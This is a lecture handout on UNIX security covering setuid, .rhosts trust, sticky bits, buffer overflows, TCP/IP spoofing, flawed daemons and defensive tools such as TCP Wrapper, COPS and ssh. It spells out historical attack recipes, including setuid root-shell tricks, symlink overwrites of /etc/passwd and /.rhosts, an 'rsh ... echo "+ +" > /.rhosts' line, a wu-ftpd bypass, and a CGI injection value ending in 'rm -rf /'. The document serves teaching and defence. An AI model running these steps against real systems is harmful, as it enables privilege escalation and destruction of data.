Lecture 11. UNIX Security

11.1 SetUID and its Exploits
11.2 .rhosts and r-commands
11.3 sticky bits
11.4 Buffer overflow
11.5 TCP/IP Protocol Vulnerabilities
11.6 Buggy programs
11.7 Security Tools

11.1 SetUID and its Exploits

UID (User ID) and GID (Group ID)

real user ID and real group ID

effective user ID and effective group ID

an active process has an effective user ID and an effective group ID that are used to determine file access permissions (see below). The effective user ID and effective group ID are equal to the process's real user ID and real group ID respectively, unless the process or one of its ancestors evolved from a file that had the set-user-ID bit or set-group-ID bit set

setting UID (chmod 4000 path) and GID (chmod 2000 path)

Example

$ cp /bin/rm .
$ cp rm srm
$ cp /bin/sh .

$ su
Password:
# id
uid=0(root) gid=0(root) ...
# chown root *
# chgrp root *
# chmod 4755
# ls -l
total 318
-wxr-xr-x   1 root     root        10116 Oct 30 14:44 rm
-wxr-xr-x   1 root     root       301272 Oct 30 14:45 sh
-wxr-xr-x   1 root     root        10116 Oct 30 14:44 srm
# ls -l /bin/sh
lrwxrwxrwx  1 root     root            4 Oct 16 22:52 /bin/sh -> bash
# chmod 4755 s*
# ls -l
total 318
-rwxr-xr-x   1 root     root        10116 Oct 30 14:44 rm
-rwsr-xr-x   1 root     root       301272 Oct 30 14:45 sh
-rwsr-xr-x   1 root     root        10116 Oct 30 14:44 srm
# exit

$ id
ud=103(rhee) gid=100(users) groups=100(users)
$ ls -l /test*
-rwxr-xr-x   1 root     root       301272 Oct 30 14:50 /test-file
-rwxr-xr-x   1 root     root       301272 Oct 30 14:50 /test-file2
$ ./rm /test-file
./rm: `/test-file'¸¦ Áö¿ó´Ï´Ù: ¸ðµå 0755À» µ¤¾î¾µ±î¿ä? y
./rm: /test-file: Çã°¡ °ÅºÎµÊ
$ ls /test*
/test-file   /test-file2
$ ./srm /test-file
$ ls /test*
/test-file2    

$ ./sh      # doesn't work in Solaris
# id
uid=103(rhee) gid=100(users) euid=0(root) groups=100(users)
# ./rm /test-file2
# ls /test*
ls: /test*: ±×·± ÆÄÀÏÀÌ³ª µð·ºÅä¸®°¡ ¾øÀ½

shell variable: IFS (Input Field Separator)
IFS = " \t\n" by default

can be changed to split text lines into fields, in which fields were separated by a character other than space characters (filelds in /etc/passwd are separated by ':')

Example of exploit (SetUID, IFS, rdist command)
"rdist" is owned by root, and has set-user-id bit set

"rdist" executes "/usr/lib/sendmail"

cp /bin/sh .

"usr.c" to be compiled into "usr"
    main() {
        setuid (0);
        chown ("sh", 0, 0);
        chmod ("sh", 04755);
    }
run "setenv IFS /"

run "rdist"

run "./sh"
lpd bug

"lpr" is owned by root, and has set-user-id bit set

"lpr" creates a spool file in "/usr/spool/lpd"

"lpr -s path" creates a symbolic link in "/usr/spool/lpd"to "path"

"rm path; ln -s /etc/passwd" path
buggy lpd repeats the names in "/usr/spool/lpd" quite often

run "lpr false-passwd" many times until "false-passwd" overwrites "/etc/passwd"

11.2 .rhosts and r-commands

The /etc/hosts.equiv and .rhosts files provide the remote authentication database for rlogin, rsh, rcp, and rcmd. The files specify remote hosts and users that are considered trusted. Trusted users are allowed to access the local system without supplying a password. The /etc/hosts.equiv file applies to the entire system, while individual users can maintain their own .rhosts files in their home directories.
The remote authentication procedure first checks the /etc/hosts.equiv file and then checks the .rhosts file in the home directory of the local user who is requesting access. Entries in these files can be of two forms. Positive entries allow access, while negative entries deny access. The authentication succeeds when a matching positive entry is found. The procedure fails when the first matching negative entry is found, or if no matching entries are found in either file. Thus, the order of entries is important; If the files contain positive and negative entries, the entry that appears first will prevail. The rsh and rcp programs fail if the remote authentication procedure fails. The rlogin program falls back to the standard password-based login procedure if the remote authentication fails.
Both files are formatted as a list of one-line entries. Each entry has the form:
hostname [username]
Negative entries are differentiated from positive entries by a `-' character preceding either the hostname or username field.
Positive Entries
If the form:
hostname
is used, then users from the named host are trusted. This form may be used in both the /etc/hosts.equiv and .rhosts files.

If the line is in the form:
hostname username
then the named user from the named host can access the system. This form may be used in individual .rhosts files to allow remote users to access the system as a different local user. If this form is used in the /etc/hosts.equiv file, the named remote user will be allowed to access the system as any local user.
The special character `+' can be used in place of either hostname or username to match any host or user. For example, the entry
+
will allow a user from any remote host to access the system with the same username. The entry
+ username
will allow the named user from any remote host to access the system.

The feature of trusted hosts is useful for many purposes:

convenient access to remote systems

X Window

access to remote devices like backup tape drives

but an extreme caution should be given; otherwise it can be a serious security hole. It is advised not to use '+' at all.

Example of exploit (SetUID, sendmail bug, .rhosts)

/usr/lib/sendmail is owned by root, and has set-user-id bit set

some old buggy /usr/lib/sendmail creates /var/tmp/dead.letter when it fails to deliver a message.

create a file (fake) to be faked as .rhosts

localhost guest

create a symbolic link to /.rhosts by "ln -s /.rhosts /var/tmp/dead.letter"

run "/usr/lib/sendmail unknown-user < fake", which will create /.rhosts containing the line

localhost guest

Some useful find commands
find all the files owned by root and set-user-id bit set
find / -user root -perm -4000 -exec ls -l {} \; | mail root
find all the world-writable files
find / -perm -0002 -exec ls -l {} \; | mail root
find all the files named .rhosts
find /user -name .rhosts -exec ls -l {} \; | mail root

11.3 sticky bits

The sticky bit (file mode bit 01000) is used to indicate special treatment of certain files and directories.
A file in a sticky directory may only be removed or renamed by a user who has write permission on the directory. This is useful for directories such as /tmp, which must be publicly writable, but should deny users permission to arbitrarily delete or rename the files of others.
If the sticky bit is set on a regular file and no execute bits are set, the system's page cache will not be used to hold the file's data. This bit is normally set on swap files of diskless clients so that accesses to these files do not flush more valuable data from the system's cache.

Example of related exploits

/tmp is supposed be set with the sticky bit. When it isn't, it can be exploited.

The command ps creates ps.xxxxx (xxxxx is the process-id of ps) and changes its ownership to root, and then renames the file as ps_data.

Attack is as follows:

prepare a personal sh file with set-user-id bit set

run ps

after ps.xxxxx is created but before its ownership is changed, do the following very quickly:

delete /tmp/ps.xxxxx

ln -s personal-sh-file /tmp/ps.xxxxx

caveat: this attack cannot be done manually; we need to write a program to the above job.

11.4 Buffer overflow

Consider:

char    s[10], t[100];

...
gets (s);
strcpy (s, t);
...

A program like above may crash or show an unexpected behavior if the input to "gets(s)" or the string in "t[]" is larger than 10 bytes. If the program were running with root permission, its user may obtain a rootshell after the crash. A safe practice would have been to use "fgets()" and "strncpy()".

some buggy rlogin, rdist, lpr give away rootshell on buffer overflow

11.5 TCP/IP Protocol Vulnerabilities

3-way handshake protocol for establishing a TCP connection:

host A --> host B: SYN (a: 32-bit seq no. called ISN)
host B --> host A: SYN (b: 32-bit seq no.), ACK (a+1)
host A --> host B: ACK (b+1)

SYN flooding attack


Every time a client SYN arrives on a valid port, a large memory structure must be allocated in a queue called backlog queue until the connection is established. There is an upper limit to amount of concurrent connection requests a given TCP can have. This limit is on the length of the backlog queue, or the limit itself is often the backlog, which is not a large value (less than 10 in many systems: Sunos 4.x, Windows NT 4.0, ...)
When the attacking host sends a SYN request using IP address spoofed to be that of an unreachable host, the targetted TCP cannot complete the 3-way handshake and will keep trying until it times out. That is the basis for the attack. The attacking host sends a few (we saw that as little as 6 is enough) SYN requests to the target TCP port.

Avarice attack (from Phrack Vol. 49)

Avarice works by listening for the 3-way handshake procedure to begin, and then immediately resetting it. The result is that no TCP based connections can be negotiated, and therefore no TCP traffic can flow.

ICMP attacks

faked ICMP unreachable message: certain hosts are unreachable

faked ICMP redirect message: sending a false routing information using a spoofed gateway address

IP Spoofing

very tricky, and famous for being used by Kevin Mitnick

host C is going to spoof as host B to host A

Assume that host B is a trusted host to host A

host C first attacks host B so that it is unreachable from host A, using DoS attack like SYN flooding.

host C repeatedly requests TCP connections to host A, and analyzes host A's ISN pattern

host C sends a SYN request to host A, spoofing as host B

host C cannot see SYN+ACK from host A, but it can make a good guess; if this guess is right, then host A accepts the connection.

host C still cannot receive packets from host A to host B, but it can send ones to host A; host C may run commands like

        rsh host-A echo "+ +" > /.rhosts

11.6 Problematic programs

sendmail and other mail related problems

debug mode enabled: allows copying of /etc/passwd and running shell scripts with root permission

$HOME/.forward may contain a line like

| uudecode

NFS (Network File System)

NFS allows the sharing of file systems and directories. NFS uses remote procedure calls (RPC) to communicate between machines. It's a service that is designed to be machine-independent and transparent to the user. When setup properly, local and remote file systems will appear as one big local file system to the user. The major functions of NFS are mount/export directories from/to other computers so that they can be accessed as if they are local.

/etc/exports: configured to be too generous

Example of stringent config: /user2 -ro,access=cs2:cs3,root=cs2

long option (> 256 bytes) doesn't work
"rpc.mountd -n" allows super-user from other host in the LAN to import the exported NFS

NIS (Network Information Service)

NIS allows networked machines to have a common interface regardless of the workstation that you log into. This service was formerly known as the Yellow Pages, or YP. With NIS you have the same passwd and group files (same uid and gid) and can be placed into the same home directory on each of your machines.

NIS server spoofing

NIS client spoofing: the server may reveal all the NIS maps including /etc/passwdor even password shadow file

TELNET

"telnetd"

FTP

Some early versions ftp allowed remote users to gain access to local account.
Anonymous ftp daemon software (wu_ftpd 2.3 or earlier; some versions of 2.4 is not safe either) allows remote users to gain access to root account.

wu-ftpd 2.3 bug

% ftp -n ftp> open target ... ftp> quote user ftp ... ftp> quote cwd root ... ftp> quote pass ftp Guest login ok, access restriction apply

Anonymous ftp requires passwd file so that it displays ownership information for files/directories, which can be exploited for password cracking.

HTTP

httpd can access any file/directory in the system in default setting: setup using chroot can limit access to a specified directory and its subdirectories.
Web server spoofing: attacking host may spoof as a real Web server
string ovreflow in URL may cause code attached to the end of URL to be executed by Web server
CGI Vulnerabilities
CGI script containing: system("/usr/lib/sendmail -t $USER < inputfile")
Attacker submits: USER="foo@bar.com < /dev/null; rm -rf /"
Java applet problems (Browser side)

Hostile applets causing DoS
Java Security Manager may fail

11.7 Security Tools

TCP Wrapper

TCP Wrapper is a simple tool to monitor and control incoming network traffic.
The program works by replacing system daemons and recording all connection requests, their times, and most importantly, their origins.
It also controls remote access using /etc/hosts.allow and/etc/hosts.deny /etc/hosts.allow in.ftpd: .sookmyung.ac.kr, .re.kr in.telnetd: ..... /etc/hosts.deny in.ftpd, in.telnetd: ALL EXCEPT 203.253 : /usr/ucb/finger -l @%h | /usr/ucb/mail manager

Logging tools: Swatch, Netlog
Logdaemon

logging and access control for r-commands, ftp, login
s/key support for login, ftp, rexecd

COPS

The heart of COPS is a collection of about a dozen programs that each attempt to tackle a different problem area of UNIX security.

file, directory, and device permissions/modes.
poor passwords.
content, format, and security of password and group files.
the programs and files run in /etc/rc* and cron(tab) files.
existence of root-SUID files, their writability, and whether or not they are shell scripts.
a CRC check against important binaries or key files to report any changes therein.
writability of users home directories and startup files (.profile, .cshrc, etc.)
anonymous ftp setup.
unrestricted tftp, decode alias in sendmail, SUID uudecode problems,
hidden shells inside inetd.conf, rexd running in inetd.conf.
miscellaneous root checks -- current directory in the search path, a "+" in /etc/host.equiv, unrestricted NFS mounts, ensuring root is in /etc/ftpusers, etc.
dates of CERT advisories vs. key files. This checks the dates that various bugs and security holes were reported by CERT against the actual date on the file in question. A positive result doesn't always mean that a bug was found, but it is a good indication that you should look at the advisory and file for further clues. A negative result, obviously, does not mean that your software has no holes, merely that it has been modified in SOME way (perhaps merely touched) since the advisory was sent out.

Tiger : similar to COPS

Password security

shadowing utility
proactive password checker like passwd+
password cracker

Remote Security Analyzer

SATAN (System Administrator Tool for Analyzing Networks)
SAINT (Security Administrator's Integrated Network Tool)
ISS (Internet Security Scanner)

Securelib

replaces routines for three kernel calls: accept(), recvfrom(), recvmsg()these replaced routines check remote access request and deny access from prohibited hosts
SOCKS Library
ssh (Secure Shell)

ssh is a program for logging into a remote machine and executing commands in a remote machine. It is intended to replace rlogin and rsh, and provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel.

When logging into the specified hostname, the user must prove his identity to the remote machine using public key authentication based on the use of digital signatures. If other authentication methods fail, ssh prompts for a password. Since all communications are encrypted, the password will not be available for eavesdroppers. All communication with the remote command or shell will be automatically encrypted.

The session terminates when the command or shell in on the remote machine exits and all X11 and TCP/IP connections have been closed.

Forwarding of arbitrary TCP/IP connections over the secure channel can be specified either on command line or in a configuration file. TCP/IP forwarding can be used for secure connections to electronic purses or going through firewalls.

ssh automatically maintains and checks a database containing public keys of hosts.